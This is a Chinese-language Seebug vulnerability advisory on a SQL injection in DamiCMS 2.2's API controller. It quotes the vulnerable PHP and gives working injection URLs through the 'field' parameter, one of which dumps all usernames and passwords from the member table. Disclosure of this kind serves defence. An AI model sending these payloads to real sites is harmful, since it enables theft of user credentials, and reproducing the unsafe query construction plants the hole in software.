DamiCMS 2.2 /Web/Lib/Action/ApiAction.class.php SQL注入漏洞

2015-04-01T00:00:00
ID SSV:89090
Type seebug
Reporter Root
Modified 2015-04-01T00:00:00

Description

<ul><li>/Web/Lib/Action/ApiAction.class.php</li></ul><pre class="">$field =!empty($_REQUEST['field'])?inject_check($_REQUEST['field']):'';

     $m=new Model($model,"",false);

     //如果使用了分页,缓存也不生效

     if($page){

           import("@.ORG.Page");     //这里改成你的Page类

          $count=$m-&gt;where($where)-&gt;count();

          $total_page = ceil($count / $pagesize);

          $p = new Page($count,$pagesize);

           //如果使用了分页,num将不起作用

           $t=$m-&gt;field($field)-&gt;where($where)-&gt;limit($p-&gt;firstRow.','.$p-&gt;listRows)-&gt;order($order)-&gt;select();

//echo $m->getLastSql();

$ret = array('total_page'=>$total_page,'data'=>$t);

     }

</pre><p>因为注入点在field里,所以可以绕过查询的关键字,导致注入。当传入:</p><pre class="">s=/api/ajax_arclist/model/article/field/database()%23</pre><p>执行的SQL语句为:</p><pre class="">SELECT database()# FROM dami_article</pre><p>页面返回: </p><p><img alt="87035C9E-A360-4281-84EA-98941C54B6AE.png" src="https://images.seebug.org/@/uploads/1434694877018-87035C9E-A360-4281-84EA-98941C54B6AE.png" data-image-size="519,61"><br></p><p>证明漏洞存在。</p><p>访问地址:</p><pre class="">http://10.211.55.12/damicms/index.php?s=/api/ajax_arclist/model/article/field/username,userpwd%20from%20dami_member%23</pre><p>得到所有用户的帐号密码: </p><p><img alt="59028A1D-7EBE-46E7-AA40-66696D0046D6.png" src="https://images.seebug.org/@/uploads/1434694899736-59028A1D-7EBE-46E7-AA40-66696D0046D6.png" data-image-size="817,83"><br></p>